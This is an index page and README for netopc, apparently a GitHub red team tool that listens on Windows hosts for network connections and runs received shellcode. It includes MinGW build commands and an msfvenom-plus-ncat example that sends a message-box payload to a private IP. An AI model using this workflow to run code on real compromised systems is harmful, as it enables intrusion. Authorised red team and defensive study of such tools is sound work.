Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/totekuh/netopc
netopc is a tool that executes shellcode on compromised systems by listening for network connections and running received shellcode in a separate process.
https://github.com/totekuh/netopc
Last synced: 1 day ago
JSON representation
netopc is a tool that executes shellcode on compromised systems by listening for network connections and running received shellcode in a separate process.
- Host: GitHub
- URL: https://github.com/totekuh/netopc
- Owner: totekuh
- Created: 2024-05-05T23:47:32.000Z (8 months ago)
- Default Branch: master
- Last Pushed: 2024-05-06T00:01:02.000Z (8 months ago)
- Last Synced: 2024-11-05T09:25:55.509Z (about 2 months ago)
- Language: C
- Homepage:
- Size: 34.2 KB
- Stars: 1
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
## Overview
`netopc` is a tool designed for red team operations to enable remote execution of shellcode on compromised systems.
It functions by listening for network connections, receiving raw machine code (shellcode), and executing the received code in a separate process.
## Prerequisites
- Linux environment
- MinGW-w64 toolchain installed for cross-compiling to Windows targets
- Standard development tools (make, gcc)## Usage
Clean the project files:
```bash
make clean
```### Compiling for x86
Use the following command to compile the project for x86 architecture:
```bash
make CC=i686-w64-mingw32-gcc
```### Compiling for x64
For compiling the project to support x64 architecture, use the x64 specific MinGW-w64 compiler:
```bash
make CC=x86_64-w64-mingw32-gcc
```Execute the compiled binary on a Windows machine or in a test environment:
```bash
./netopc.exe
```### Testing
Use this command to start up `netopc`:
```powershell
PS C:\Users\User> .\netopc.exe
```Use the following commands to generate shellcode that pops up a message box and then execute it remotely on the compromised system where `netopc` is running:
```bash
msfvenom -p windows/messagebox -f raw > shellcode.bin
cat shellcode.bin |ncat 192.168.56.104 42000
```![netopc](./.img/msfvenom.png)